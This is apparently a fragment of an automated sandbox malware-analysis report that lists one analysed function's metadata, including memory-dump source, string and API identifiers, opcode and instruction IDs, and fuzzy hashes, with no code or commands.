                                                                                                                                                  • Instruction Fuzzy Hash: E051F570D01209DFDB10EFA8D4847ADBBB2FB4D310F24952AD415BB294DB79A981CF64
                                                                                                                                                  Function 01586920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                  • API String ID: 0-3001612457
                                                                                                                                                  • Opcode ID: 7b688df70e9386837475fdf8cacf29607b0f18897b44fbe80843eb9bb7a074f1
                                                                                                                                                  • Instruction ID: 219e8696a7e7f2859223e31aaa103a96a5a99c750df4f5aa2f17fecefc55aca4
                                                                                                                                                  • Opcode Fuzzy Hash: 7b688df70e9386837475fdf8cacf29607b0f18897b44fbe80843eb9bb7a074f1
                                                                                                                                                  • Instruction Fuzzy Hash: 9901F231B401048FCB24AE2CC544EAA77EBBF88B60725486AE546EF3F5DB31DC418740